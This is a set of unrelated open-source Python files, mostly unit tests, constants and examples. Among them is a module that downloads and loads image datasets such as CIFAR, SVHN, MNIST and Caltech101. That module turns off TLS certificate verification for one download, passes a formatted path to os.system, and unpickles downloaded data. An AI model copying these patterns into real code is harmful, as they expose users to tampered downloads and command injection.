rtol=1e-3, atol=1e-3) np.testing.assert_allclose(np.arctan(self.random_number3), dc.atan(self.random_number3), rtol=1e-3, atol=1e-3) def test_nnScalar_asinh (self): np.testing.assert_allclose(np.arcsinh(self.random_number1), dc.asinh(self.random_number1), rtol=1e-3, atol=1e-3) np.testing.assert_allclose(np.arcsinh(self.random_number2), dc.asinh(self.random_number2), rtol=1e-3, atol=1e-3) np.testing.assert_allclose(np.arcsinh(self.random_number3), dc.asinh(self.random_number3), rtol=1e-3, atol=1e-3) def test_nnScalar_acosh (self): np.testing.assert_allclose(np.arccosh(self.random_number1), dc.acosh(self.random_number1), rtol=1e-3, atol=1e-3) np.testing.assert_allclose(np.arccosh(self.random_number2), dc.acosh(self.random_number2), rtol=1e-3, atol=1e-3) np.testing.assert_allclose(np.arccosh(self.random_number3), dc.acosh(self.random_number3), rtol=1e-3, atol=1e-3) # def test_nnScalar_atanh (self): # np.testing.assert_allclose(np.arctanh(self.random_number1), dc.atanh(self.random_number1), rtol=1e-3, atol=1e-3) # np.testing.assert_allclose(np.arctanh(self.random_number2), dc.atanh(self.random_number2), rtol=1e-3, atol=1e-3) # np.testing.assert_allclose(np.arctanh(self.random_number3), dc.atanh(self.random_number3), rtol=1e-3, atol=1e-3) def test_nnScalar_sin (self): np.testing.assert_allclose(np.sin(self.random_number1), dc.sin(self.random_number1), rtol=1e-3, atol=1e-3) np.testing.assert_allclose(np.sin(self.random_number2), dc.sin(self.random_number2), rtol=1e-3, atol=1e-3) np.testing.assert_allclose(np.sin(self.random_number3), dc.sin(self.random_number3), rtol=1e-3, atol=1e-3) def test_nnScalar_cos (self): np.testing.assert_allclose(np.cos(self.random_number1), dc.cos(self.random_number1), rtol=1e-3, atol=1e-3) np.testing.assert_allclose(np.cos(self.random_number2), dc.cos(self.random_number2), rtol=1e-3, atol=1e-3) np.testing.assert_allclose(np.cos(self.random_number3), dc.cos(self.random_number3), rtol=1e-3, atol=1e-3) def test_nnScalar_tan (self): np.testing.assert_allclose(np.tan(self.random_number1), dc.tan(self.random_number1), rtol=1e-3, atol=1e-3) np.testing.assert_allclose(np.tan(self.random_number2), dc.tan(self.random_number2), rtol=1e-3, atol=1e-3) np.testing.assert_allclose(np.tan(self.random_number3), dc.tan(self.random_number3), rtol=1e-3, atol=1e-3) # def test_nnScalar_sinh (self): # np.testing.assert_allclose(np.sinh(self.random_number1), dc.sinh(self.random_number1), rtol=1e-3, atol=1e-3) # np.testing.assert_allclose(np.sinh(self.random_number2), dc.sinh(self.random_number2), rtol=1e-3, atol=1e-3) # np.testing.assert_allclose(np.sinh(self.random_number3), dc.sinh(self.random_number3), rtol=1e-3, atol=1e-3) # def test_nnScalar_cosh (self): # np.testing.assert_allclose(np.cosh(self.random_number1), dc.cosh(self.random_number1), rtol=1e-3, atol=1e-3) # np.testing.assert_allclose(np.cosh(self.random_number2), dc.cosh(self.random_number2), rtol=1e-3, atol=1e-3) # np.testing.assert_allclose(np.cosh(self.random_number3), dc.cosh(self.random_number3), rtol=1e-3, atol=1e-3) def test_nnScalar_tanh (self): np.testing.assert_allclose(np.tanh(self.random_number1), dc.tanh(self.random_number1), rtol=1e-3, atol=1e-3) np.testing.assert_allclose(np.tanh(self.random_number2), dc.tanh(self.random_number2), rtol=1e-3, atol=1e-3) np.testing.assert_allclose(np.tanh(self.random_number3), dc.tanh(self.random_number3), rtol=1e-3, atol=1e-3) def test_nnScalar_erf (self): np.testing.assert_allclose(temp_erf(self.random_number1), dc.erf(self.random_number1), rtol=1e-3, atol=1e-3) np.testing.assert_allclose(temp_erf(self.random_number2), dc.erf(self.random_number2), rtol=1e-3, atol=1e-3) np.testing.assert_allclose(temp_erf(self.random_number3), dc.erf(self.random_number3), rtol=1e-3, atol=1e-3) # def test_nnScalar_exp (self): # np.testing.assert_allclose(np.exp(self.random_number1), dc.exp(self.random_number1), rtol=1e-3, atol=1e-3) # np.testing.assert_allclose(np.exp(self.random_number2), dc.exp(self.random_number2), rtol=1e-3, atol=1e-3) # np.testing.assert_allclose(np.exp(self.random_number3), dc.exp(self.random_number3), rtol=1e-3, atol=1e-3) def test_nnScalar_log (self): np.testing.assert_allclose(np.log(self.random_number1), dc.log(self.random_number1), rtol=1e-3, atol=1e-3) np.testing.assert_allclose(np.log(self.random_number2), dc.log(self.random_number2), rtol=1e-3, atol=1e-3) np.testing.assert_allclose(np.log(self.random_number3), dc.log(self.random_number3), rtol=1e-3, atol=1e-3) def test_nnScalar_logical_not (self): np.testing.assert_allclose(np.logical_not(self.random_number1), dc.logical_not(self.random_number1), rtol=1e-3, atol=1e-3) np.testing.assert_allclose(np.logical_not(self.random_number2), dc.logical_not(self.random_number2), rtol=1e-3, atol=1e-3) np.testing.assert_allclose(np.logical_not(self.random_number3), dc.logical_not(self.random_number3), rtol=1e-3, atol=1e-3) def test_nnScalar_sign (self): np.testing.assert_allclose(np.sign(self.random_number1), dc.sign(self.random_number1), rtol=1e-3, atol=1e-3) np.testing.assert_allclose(np.sign(self.random_number2), dc.sign(self.random_number2), rtol=1e-3, atol=1e-3) np.testing.assert_allclose(np.sign(self.random_number3), dc.sign(self.random_number3), rtol=1e-3, atol=1e-3) def test_nnScalar_softsign (self): np.testing.assert_allclose(temp_softsign(self.random_number1), dc.softsign(self.random_number1), rtol=1e-3, atol=1e-3) np.testing.assert_allclose(temp_softsign(self.random_number2), dc.softsign(self.random_number2), rtol=1e-3, atol=1e-3) np.testing.assert_allclose(temp_softsign(self.random_number3), dc.softsign(self.random_number3), rtol=1e-3, atol=1e-3) def test_nnScalar_max (self): npr = np.maximum(self.np_a, self.np_b) dcr = dc.max([self.dc_a,self.dc_b]) np.testing.assert_allclose(npr, np.array(dcr).astype(np.float32),rtol=1e-3, atol=1e-3) def test_nnScalar_min (self): npr = np.minimum(self.np_a, self.np_b) dcr = dc.min([self.dc_a,self.dc_b]) np.testing.assert_allclose(npr, np.array(dcr).astype(np.float32),rtol=1e-3, atol=1e-3) def tearDown(self): return "test finished" if __name__ == '__main__': unittest.main()
tests/api/test_communities.py
LEv145/python-twitch-client
171
12635172
<filename>tests/api/test_communities.py import json import pytest import responses from twitch.client import TwitchClient from twitch.constants import BASE_URL from twitch.exceptions import TwitchAttributeException from twitch.resources import Community, User example_community = { "_id": "e9f17055-810f-4736-ba40-fba4ac541caa", "name": "DallasTesterCommunity", } example_user = { "_id": "44322889", "name": "dallas", } @responses.activate def test_get_by_name(): responses.add( responses.GET, "{}communities".format(BASE_URL), body=json.dumps(example_community), status=200, content_type="application/json", ) client = TwitchClient("client id") community = client.communities.get_by_name("spongebob") assert len(responses.calls) == 1 assert isinstance(community, Community) assert community.id == example_community["_id"] assert community.name == example_community["name"] @responses.activate def test_get_by_id(): community_id = "abcd" responses.add( responses.GET, "{}communities/{}".format(BASE_URL, community_id), body=json.dumps(example_community), status=200, content_type="application/json", ) client = TwitchClient("client id") community = client.communities.get_by_id(community_id) assert len(responses.calls) == 1 assert isinstance(community, Community) assert community.id == example_community["_id"] assert community.name == example_community["name"] @responses.activate def test_update(): community_id = "abcd" responses.add( responses.PUT, "{}communities/{}".format(BASE_URL, community_id), body=json.dumps(example_community), status=204, content_type="application/json", ) client = TwitchClient("client id") client.communities.update(community_id) assert len(responses.calls) == 1 @responses.activate def test_get_top(): response = {"_cursor": "MTA=", "_total": 100, "communities": [example_community]} responses.add( responses.GET, "{}communities/top".format(BASE_URL), body=json.dumps(response), status=200, content_type="application/json", ) client = TwitchClient("client id") communities = client.communities.get_top() assert len(responses.calls) == 1 assert len(communities) == 1 community = communities[0] assert isinstance(community, Community) assert community.id == example_community["_id"] assert community.name == example_community["name"] @responses.activate @pytest.mark.parametrize("param,value", [("limit", 101)]) def test_get_top_raises_if_wrong_params_are_passed_in(param, value): client = TwitchClient("client id") kwargs = {param: value} with pytest.raises(TwitchAttributeException): client.communities.get_top(**kwargs) @responses.activate def test_get_banned_users(): community_id = "abcd" response = {"_cursor": "", "banned_users": [example_user]} responses.add( responses.GET, "{}communities/{}/bans".format(BASE_URL, community_id), body=json.dumps(response), status=200, content_type="application/json", ) client = TwitchClient("client id", "oauth token") users = client.communities.get_banned_users(community_id) assert len(responses.calls) == 1 assert len(users) == 1 user = users[0] assert isinstance(user, User) assert user.id == example_user["_id"] assert user.name == example_user["name"] @responses.activate @pytest.mark.parametrize("param,value", [("limit", 101)]) def test_get_banned_users_raises_if_wrong_params_are_passed_in(param, value): client = TwitchClient("client id", "oauth token") kwargs = {param: value} with pytest.raises(TwitchAttributeException): client.communities.get_banned_users("1234", **kwargs) @responses.activate def test_ban_user(): community_id = "abcd" user_id = 1234 responses.add( responses.PUT, "{}communities/{}/bans/{}".format(BASE_URL, community_id, user_id), status=204, content_type="application/json", ) client = TwitchClient("client id", "oauth token") client.communities.ban_user(community_id, user_id) assert len(responses.calls) == 1 @responses.activate def test_unban_user(): community_id = "abcd" user_id = 1234 responses.add( responses.DELETE, "{}communities/{}/bans/{}".format(BASE_URL, community_id, user_id), status=204, content_type="application/json", ) client = TwitchClient("client id", "oauth token") client.communities.unban_user(community_id, user_id) assert len(responses.calls) == 1 @responses.activate def test_create_avatar_image(): community_id = "abcd" responses.add( responses.POST, "{}communities/{}/images/avatar".format(BASE_URL, community_id), status=204, content_type="application/json", ) client = TwitchClient("client id", "oauth token") client.communities.create_avatar_image(community_id, "imagecontent") assert len(responses.calls) == 1 @responses.activate def test_delete_avatar_image(): community_id = "abcd" responses.add( responses.DELETE, "{}communities/{}/images/avatar".format(BASE_URL, community_id), status=204, content_type="application/json", ) client = TwitchClient("client id", "oauth token") client.communities.delete_avatar_image(community_id) assert len(responses.calls) == 1 @responses.activate def test_create_cover_image(): community_id = "abcd" responses.add( responses.POST, "{}communities/{}/images/cover".format(BASE_URL, community_id), status=204, content_type="application/json", ) client = TwitchClient("client id", "oauth token") client.communities.create_cover_image(community_id, "imagecontent") assert len(responses.calls) == 1 @responses.activate def test_delete_cover_image(): community_id = "abcd" responses.add( responses.DELETE, "{}communities/{}/images/cover".format(BASE_URL, community_id), status=204, content_type="application/json", ) client = TwitchClient("client id", "oauth token") client.communities.delete_cover_image(community_id) assert len(responses.calls) == 1 @responses.activate def test_get_moderators(): community_id = "abcd" response = {"moderators": [example_user]} responses.add( responses.GET, "{}communities/{}/moderators".format(BASE_URL, community_id), body=json.dumps(response), status=200, content_type="application/json", ) client = TwitchClient("client id", "oauth token") moderators = client.communities.get_moderators(community_id) assert len(responses.calls) == 1 assert len(moderators) == 1 user = moderators[0] assert isinstance(user, User) assert user.id == example_user["_id"] assert user.name == example_user["name"] @responses.activate def test_add_moderator(): community_id = "abcd" user_id = 12345 responses.add( responses.PUT, "{}communities/{}/moderators/{}".format(BASE_URL, community_id, user_id), status=204, content_type="application/json", ) client = TwitchClient("client id", "oauth token") client.communities.add_moderator(community_id, user_id) assert len(responses.calls) == 1 @responses.activate def test_delete_moderator(): community_id = "abcd" user_id = 12345 responses.add( responses.DELETE, "{}communities/{}/moderators/{}".format(BASE_URL, community_id, user_id), status=204, content_type="application/json", ) client = TwitchClient("client id", "oauth token") client.communities.delete_moderator(community_id, user_id) assert len(responses.calls) == 1 @responses.activate def test_get_permissions(): community_id = "abcd" response = {"ban": True, "timeout": True, "edit": True} responses.add( responses.GET, "{}communities/{}/permissions".format(BASE_URL, community_id), body=json.dumps(response), status=200, content_type="application/json", ) client = TwitchClient("client id", "oauth token") permissions = client.communities.get_permissions(community_id) assert len(responses.calls) == 1 assert isinstance(permissions, dict) assert permissions["ban"] is True @responses.activate def test_report_violation(): community_id = "abcd" responses.add( responses.POST, "{}communities/{}/report_channel".format(BASE_URL, community_id), status=204, content_type="application/json", ) client = TwitchClient("client id", "oauth token") client.communities.report_violation(community_id, 12345) assert len(responses.calls) == 1 @responses.activate def test_get_timed_out_users(): community_id = "abcd" response = {"_cursor": "", "timed_out_users": [example_user]} responses.add( responses.GET, "{}communities/{}/timeouts".format(BASE_URL, community_id), body=json.dumps(response), status=200, content_type="application/json", ) client = TwitchClient("client id", "oauth token") users = client.communities.get_timed_out_users(community_id) assert len(responses.calls) == 1 assert len(users) == 1 user = users[0] assert isinstance(user, User) assert user.id == example_user["_id"] assert user.name == example_user["name"] @responses.activate @pytest.mark.parametrize("param,value", [("limit", 101)]) def test_get_timed_out_users_raises_if_wrong_params_are_passed_in(param, value): client = TwitchClient("client id", "oauth token") kwargs = {param: value} with pytest.raises(TwitchAttributeException): client.communities.get_timed_out_users("1234", **kwargs) @responses.activate def test_add_timed_out_user(): community_id = "abcd" user_id = 12345 responses.add( responses.PUT, "{}communities/{}/timeouts/{}".format(BASE_URL, community_id, user_id), status=204, content_type="application/json", ) client = TwitchClient("client id", "oauth token") client.communities.add_timed_out_user(community_id, user_id, 5) assert len(responses.calls) == 1 @responses.activate def test_delete_timed_out_user(): community_id = "abcd" user_id = 12345 responses.add( responses.DELETE, "{}communities/{}/timeouts/{}".format(BASE_URL, community_id, user_id), status=204, content_type="application/json", ) client = TwitchClient("client id", "oauth token") client.communities.delete_timed_out_user(community_id, user_id) assert len(responses.calls) == 1
lib/coloraide/spaces/xyz.py
facelessuser/ColorHelper
253
12635178
"""XYZ D65 class.""" from ..spaces import Space, RE_DEFAULT_MATCH, GamutUnbound import re class XYZ(Space): """XYZ D65 class.""" SPACE = "xyz" SERIALIZE = ("xyz", "xyz-d65") CHANNEL_NAMES = ("x", "y", "z", "alpha") DEFAULT_MATCH = re.compile(RE_DEFAULT_MATCH.format(color_space='|'.join(SERIALIZE), channels=3)) WHITE = "D65" RANGE = ( GamutUnbound([0.0, 1.0]), GamutUnbound([0.0, 1.0]), GamutUnbound([0.0, 1.0]) ) @property def x(self): """X channel.""" return self._coords[0] @x.setter def x(self, value): """Shift the X.""" self._coords[0] = self._handle_input(value) @property def y(self): """Y channel.""" return self._coords[1] @y.setter def y(self, value): """Set Y.""" self._coords[1] = self._handle_input(value) @property def z(self): """Z channel.""" return self._coords[2] @z.setter def z(self, value): """Set Z channel.""" self._coords[2] = self._handle_input(value) @classmethod def _to_xyz(cls, parent, xyz): """To XYZ.""" return parent.chromatic_adaptation(cls.WHITE, XYZ.WHITE, xyz) @classmethod def _from_xyz(cls, parent, xyz): """From XYZ.""" return parent.chromatic_adaptation(XYZ.WHITE, cls.WHITE, xyz)
homeassistant/components/kulersky/const.py
MrDelik/core
30,023
12635182
<filename>homeassistant/components/kulersky/const.py """Constants for the Kuler Sky integration.""" DOMAIN = "kulersky" DATA_ADDRESSES = "addresses" DATA_DISCOVERY_SUBSCRIPTION = "discovery_subscription"
tests/template_tests/templatetags/tag_27584.py
ni-ning/django
61,676
12635212
<filename>tests/template_tests/templatetags/tag_27584.py from django import template register = template.Library() @register.tag def badtag(parser, token): parser.parse(('endbadtag',)) parser.delete_first_token() return BadNode() class BadNode(template.Node): def render(self, context): raise template.TemplateSyntaxError('error')
vol2/vol2-python-examples/examples/example_crossover.py
Sun-Joong/aifh
777
12635230
<gh_stars>100-1000 #!/usr/bin/env python """ Artificial Intelligence for Humans Volume 2: Nature-Inspired Algorithms Python Version http://www.aifh.org http://www.jeffheaton.com Code repository: https://github.com/jeffheaton/aifh Copyright 2014 by <NAME> Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. For more information on Heaton Research copyrights, licenses and trademarks visit: http://www.heatonresearch.com/copyright ============================================================================================================ This example uses crossover to combine two parent genomes to produce two children. Both repeating and non-repeating splice are used. Crossover Splice Parent 1: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10] Parent 2: [10, 9, 8, 7, 6, 5, 4, 3, 2, 1] Offspring 1: [1, 2, 3, 4, 5, 6, 4, 3, 2, 1] Offspring 2: [10, 9, 8, 7, 6, 5, 7, 8, 9, 10] Crossover Splice No Repeat Parent 1: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10] Parent 2: [10, 9, 8, 7, 6, 5, 4, 3, 2, 1] Offspring 1: [10, 3, 2, 4, 5, 6, 7, 8, 9, 1] Offspring 2: [1, 8, 9, 7, 6, 5, 4, 3, 2, 10] """ import sys import os # Find the AIFH core files aifh_dir = os.path.dirname(os.path.abspath(__file__)) aifh_dir = os.path.abspath(aifh_dir + os.sep + ".." + os.sep + "lib" + os.sep + "aifh") sys.path.append(aifh_dir) from genetic import * from genetic import Genome from genetic import Species p1 = [ 1,2,3,4,5,6,7,8,9,10 ] p2 = [ 10,9,8,7,6,5,4,3,2,1 ] off = [[],[]] pop = Population() print("Crossover Splice") crossover_splice(pop, p1,p2,off) print("Parent 1: " + str(p1)) print("Parent 2: " + str(p2)) print("Offspring 1: " + str(off[0])) print("Offspring 2: " + str(off[1])) print() print("Crossover Splice No Repeat") crossover_splice_no_repeat(pop, p1,p2,off) print("Parent 1: " + str(p1)) print("Parent 2: " + str(p2)) print("Offspring 1: " + str(off[0])) print("Offspring 2: " + str(off[1]))
tests/ut/python/pass/test_helptiling.py
tianjiashuo/akg
286
12635231
# Copyright 2020 Huawei Technologies Co., Ltd # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import logging from akg.utils import kernel_exec as utils LEVEL1_SUCC = "Help tiling level 1 exit successfully" LEVEL2_SUCC = "Help tiling level 2 exit successfully" LEVEL3_SUCC = "Help tiling level 3 exit successfully" def build_five2four(shape_5d, dtype, op_attrs, attrs, kernel_name='five2four', tuning=False): from akg.ops.array.ascend import five2four utils.op_build_test(five2four.five2four, [shape_5d], [dtype], op_attrs, kernel_name=kernel_name, attrs=attrs, tuning=tuning) def test_five2four(): shape_5d = [1, 1, 1088, 1, 16] dtype = "float32" op_attrs = [[1, 1088, 1, 16], "float32", 'NHWC'] try: attrs = {"help_tiling": 1} build_five2four(shape_5d, dtype, op_attrs, attrs) except SystemExit: logging.info(LEVEL1_SUCC) try: attrs = {"help_tiling": 2} build_five2four(shape_5d, dtype, op_attrs, attrs) except SystemExit: logging.info(LEVEL2_SUCC) try: attrs = {"help_tiling": 3} build_five2four(shape_5d, dtype, op_attrs, attrs) except SystemExit: logging.info(LEVEL3_SUCC) if __name__ == "__main__": test_five2four()
stonesoup/detector/tests/test_tensorflow.py
Red-Portal/Stone-Soup-1
157
12635246
# -*- coding: utf-8 -* import pytest try: from stonesoup.detector.tensorflow import TensorFlowBoxObjectDetector except ImportError: # Catch optional dependencies import error pytest.skip( "Skipping due to missing optional dependencies. Usage of the TensorFlow detectors " "requires that TensorFlow and the TensorFlow Object Detection API are installed. A quick " "guide on how to set these up can be found here: " "https://tensorflow-object-detection-api-tutorial.readthedocs.io/en/latest/install.html", allow_module_level=True ) def test_tensorflow_box_object_detector(): # Expect Type error with pytest.raises(TypeError): TensorFlowBoxObjectDetector() # TODO: Add more tests
libs/input_modules/get_datasets.py
dylancashman/metaqnn
136
12635252
<gh_stars>100-1000 import numpy as np import os import pickle import shutil import struct import tarfile import urllib import ssl from scipy import io, misc def get_caltech101(save_dir=None, root_path=None): assert((save_dir is not None and root_path is None) or (save_dir is None and root_path is not None)) if root_path is None: ctx = ssl.create_default_context() ctx.check_hostname = False ctx.verify_mode = ssl.CERT_NONE print 'Downloading Caltech101 dataset...' tar_path = os.path.join(save_dir, "101_ObjectCategories.tar.gz") url = urllib.URLopener(context=ctx) url.retrieve("https://www.vision.caltech.edu/Image_Datasets/Caltech101/101_ObjectCategories.tar.gz", tar_path) print 'Download Done, Extracting...' tar = tarfile.open(tar_path) tar.extractall(save_dir) tar.close() root = os.path.join(save_dir, "101_ObjectCategories") if not root_path else root_path train_x = [] train_y = [] val_x = [] val_y = [] label = 0 for cls_folder in os.listdir(root): cls_root = os.path.join(root, cls_folder) if not os.path.isdir(cls_root): continue cls_images = [misc.imread(os.path.join(cls_root, img_name)) for img_name in os.listdir(cls_root)] cls_images = [np.repeat(np.expand_dims(img, 2), 3, axis=2) if len(img.shape) == 2 else img for img in cls_images] cls_images = np.array([np.reshape(misc.imresize(img, (224,224,3)), (3,224,224)) for img in cls_images]) new_index = np.random.permutation(np.arange(cls_images.shape[0])) cls_images = cls_images[new_index, :, :, :] train_x.append(cls_images[:30]) train_y.append(np.array([label]*30)) if len(cls_images) <= 80: val_x.append(cls_images[30:]) val_y.append(np.array([label]*(len(cls_images)-30))) else: val_x.append(cls_images[30:80]) val_y.append(np.array([label]*50)) label += 1 Xtr = np.concatenate(train_x) Ytr = np.concatenate(train_y) Xval= np.concatenate(val_x) Yval= np.concatenate(val_y) print 'Xtr shape ', Xtr.shape print 'Ytr shape ', Ytr.shape print 'Xval shape ', Xval.shape print 'Yval shape ', Yval.shape return Xtr, Ytr, Xval, Yval def load_CIFAR_batch(filename): """ load single batch of cifar """ with open(filename, 'rb') as f: datadict = pickle.load(f) X = datadict['data'] Y = datadict['labels'] X = X.reshape(10000, 3, 32, 32).astype(np.uint8) Y = np.array(Y, dtype=np.int64) return X, Y def get_cifar10(save_dir=None, root_path=None): ''' If root_path is None, we download the data set from internet. Either save path or root path must not be None and not both. Returns Xtr, Ytr, Xte, Yte as numpy arrays ''' assert((save_dir is not None and root_path is None) or (save_dir is None and root_path is not None)) if root_path is None: print 'Downloading CIFAR10 dataset...' tar_path = os.path.join(save_dir, "cifar-10-python.tar.gz") url = urllib.URLopener() url.retrieve("https://www.cs.toronto.edu/~kriz/cifar-10-python.tar.gz", tar_path) print 'Download Done, Extracting...' tar = tarfile.open(tar_path) tar.extractall(save_dir) tar.close() root = os.path.join(save_dir, "cifar-10-batches-py") if not root_path else root_path # Training Data xs = [] ys = [] for b in range(1,6): f = os.path.join(root, 'data_batch_%d' % (b, )) X, Y = load_CIFAR_batch(f) xs.append(X) ys.append(Y) Xtr = np.concatenate(xs) Ytr = np.concatenate(ys) print 'Xtrain shape', Xtr.shape print 'Ytrain shape', Ytr.shape # Testing data Xte, Yte = load_CIFAR_batch(os.path.join(root, 'test_batch')) print 'Xtest shape', Xte.shape print 'Ytest shape', Yte.shape return Xtr, Ytr, Xte, Yte def get_svhn(save_dir=None, root_path=None): ''' If root_path is None, we download the data set from internet. Either save path or root path must not be None and not both. Returns Xtr, Ytr, Xte, Yte as numpy arrays ''' assert((save_dir is not None and root_path is None) or (save_dir is None and root_path is not None)) if root_path is None: new_save_dir = os.path.join(save_dir, 'og_data') if not os.path.isdir(new_save_dir): os.mkdir(new_save_dir) train_mat = os.path.join(new_save_dir, "train_32x32.mat") test_mat = os.path.join(new_save_dir, "test_32x32.mat") url = urllib.URLopener() print 'Downloading Svhn Train...' url.retrieve("http://ufldl.stanford.edu/housenumbers/train_32x32.mat", train_mat) print 'Downloading Svhn Test...' url.retrieve("http://ufldl.stanford.edu/housenumbers/test_32x32.mat", test_mat) root = new_save_dir if not root_path else root_path train = io.loadmat(os.path.join(root, 'train_32x32.mat')) Xtr = train['X'] Ytr = train['y'] del train test = io.loadmat(os.path.join(root, 'test_32x32.mat')) Xte = test['X'] Yte = test['y'] del test Xtr = np.transpose(Xtr, (3, 2, 0, 1)) Xte = np.transpose(Xte, (3, 2, 0, 1)) Ytr = Ytr.reshape(Ytr.shape[:1]) - 1 Yte = Yte.reshape(Yte.shape[:1]) - 1 print 'Xtrain shape', Xtr.shape print 'Ytrain shape', Ytr.shape print 'Xtest shape', Xte.shape print 'Ytest shape', Yte.shape return Xtr, Ytr, Xte, Yte def get_svhn_small(save_dir=None, root_path=None): assert((save_dir is not None and root_path is None) or (save_dir is None and root_path is not None)) Xtr, Ytr, Xte, Yte = get_svhn(save_dir, root_path) val_x = [] val_y = [] train_x = [] train_y = [] for i in np.unique(Ytr): # Get 400 images from X_small X_small_label = Xtr[Ytr == i] train_x.append(X_small_label[:700]) train_y.append([i]*700) val_x.append(X_small_label[700:1000]) val_y.append([i]*300) Xtr = np.concatenate(train_x) Ytr = np.concatenate(train_y) Xval = np.concatenate(val_x) Yval = np.concatenate(val_y) print 'Xtrain shape', Xtr.shape print 'Ytrain shape', Ytr.shape print 'Xval shape', Xval.shape print 'Yval shape', Yval.shape print 'Xtest shape', Xte.shape print 'Ytest shape', Yte.shape return Xtr, Ytr, Xval, Yval, Xte, Yte def get_svhn_full(save_dir=None, root_path=None): ''' If root_path is None, we download the data set from internet. Either save path or root path must not be None and not both. Returns Xtr, Ytr, Xte, Yte as numpy arrays ''' assert((save_dir is not None and root_path is None) or (save_dir is None and root_path is not None)) Xtr_small, Ytr_small, Xte, Yte = get_svhn(save_dir, root_path) if root_path is None: new_save_dir = os.path.join(save_dir, 'og_data') if not os.path.isdir(new_save_dir): os.mkdir(new_save_dir) extra_mat = os.path.join(new_save_dir, "extra_32x32.mat") url = urllib.URLopener() print 'Downloading Svhn Extra...' url.retrieve("http://ufldl.stanford.edu/housenumbers/extra_32x32.mat", extra_mat) root = new_save_dir if not root_path else root_path extra = io.loadmat(os.path.join(root, 'extra_32x32.mat')) Xtr_extra = extra['X'] Ytr_extra = extra['y'] Xtr_extra = np.transpose(Xtr_extra, (3, 2, 0, 1)) Ytr_extra = Ytr_extra.reshape(Ytr_extra.shape[:1]) - 1 print 'Xextra shape', Xtr_extra.shape print 'Yextra shape', Ytr_extra.shape val_x = [] val_y = [] train_x = [] train_y = [] for i in np.unique(Ytr_small): # Get 400 images from X_small X_small_label = Xtr_small[Ytr_small == i] val_x.append(X_small_label[:400]) val_y.append([i]*400) train_x.append(X_small_label[400:]) train_y.append([i]*(X_small_label.shape[0] - 400)) # Get 200 images from X_small X_extra_label = Xtr_extra[Ytr_extra == i] val_x.append(X_extra_label[:200]) val_y.append([i]*200) train_x.append(X_extra_label[200:]) train_y.append([i]*(X_extra_label.shape[0] - 200)) Xtr = np.concatenate(train_x) Ytr = np.concatenate(train_y) Xval = np.concatenate(val_x) Yval = np.concatenate(val_y) return Xtr, Ytr, Xval, Yval, Xte, Yte def load_cifar100_data(filename): with open(filename, 'rb') as f: datadict = pickle.load(f) data = datadict['data'] labels = datadict['fine_labels'] N = len(labels) data = data.reshape((N, 3, 32, 32)) labels = np.array(labels) return data,labels def get_cifar100(save_dir=None, root_path=None): ''' If root_path is None, we download the data set from internet. Either save path or root path must not be None and not both. Returns Xtr, Ytr, Xte, Yte as numpy arrays ''' assert((save_dir is not None and root_path is None) or (save_dir is None and root_path is not None)) if root_path is None: print 'Downloading CIFAR100 dataset...' tar_path = os.path.join(save_dir, "cifar-100-python.tar.gz") url = urllib.URLopener() url.retrieve("https://www.cs.toronto.edu/~kriz/cifar-100-python.tar.gz", tar_path) print 'Download Done, Extracting...' tar = tarfile.open(tar_path) tar.extractall(save_dir) tar.close() root = os.path.join(save_dir, "cifar-100-python") if not root_path else root_path Xtr, Ytr = load_cifar100_data(os.path.join(root, 'train')) Xte, Yte = load_cifar100_data(os.path.join(root, 'test')) print 'Xtrain shape', Xtr.shape print 'Ytrain shape', Ytr.shape print 'Xtest shape', Xte.shape print 'Ytest shape', Yte.shape return Xtr, Ytr, Xte, Yte def get_byte(file_in): int_out = ord(file_in.read(1)) return int_out def get_int(file_in): int_out = struct.unpack('>i', file_in.read(4))[0] return int_out def get_image(file_in, row=28, col=28): raw_data = file_in.read(row*col) out_image = np.frombuffer(raw_data, np.uint8) out_image = out_image.reshape((28,28)) return out_image def load_mnist(image_fname, label_fname): with open(image_fname, "rb") as image_file, open(label_fname, "rb") as label_file: assert(get_int(image_file) == 2051) assert(get_int(label_file) == 2049) n_items_label =get_int(label_file) n_items = get_int(image_file) assert(n_items_label == n_items) assert(get_int(image_file) == 28) assert(get_int(image_file) == 28) Y = [] X = np.zeros((n_items, 1, 28, 28), dtype=np.uint8) print "Reading [%d] items" % n_items for i in range(n_items): label = get_byte(label_file) assert(label <= 9) assert(label >= 0) Y.append(label) X[i,:] = get_image(image_file) return X, np.asarray(Y) def get_mnist(save_dir=None, root_path=None): ''' If root_path is None, we download the data set from internet. Either save path or root path must not be None and not both. Returns Xtr, Ytr, Xte, Yte as numpy arrays ''' assert((save_dir is not None and root_path is None) or (save_dir is None and root_path is not None)) mnist_files = ['train-images-idx3-ubyte', 'train-labels-idx1-ubyte', 't10k-images-idx3-ubyte','t10k-labels-idx1-ubyte'] out_mnist_files = [] if root_path is None: print 'Downloading MNIST dataset...' for fname in mnist_files: out_file = os.path.join(save_dir, "%s" % fname) tar_path = os.path.join(save_dir, "%s.gz" % fname) out_mnist_files.append(out_file) url = urllib.URLopener() url.retrieve("http://yann.lecun.com/exdb/mnist/%s.gz" % fname, tar_path) print 'Download Done, Extracting... [%s]' % tar_path os.system('gunzip -f %s' % tar_path) Xtr, Ytr = load_mnist(out_mnist_files[0], out_mnist_files[1]) print 'Xtrain shape', Xtr.shape print 'Ytrain shape', Ytr.shape # Testing data Xte, Yte = load_mnist(out_mnist_files[2], out_mnist_files[3]) print 'Xtest shape', Xte.shape print 'Ytest shape', Yte.shape return Xtr, Ytr, Xte, Yte
Chapter03/eval.py
jvstinian/Python-Reinforcement-Learning-Projects
114
12635263
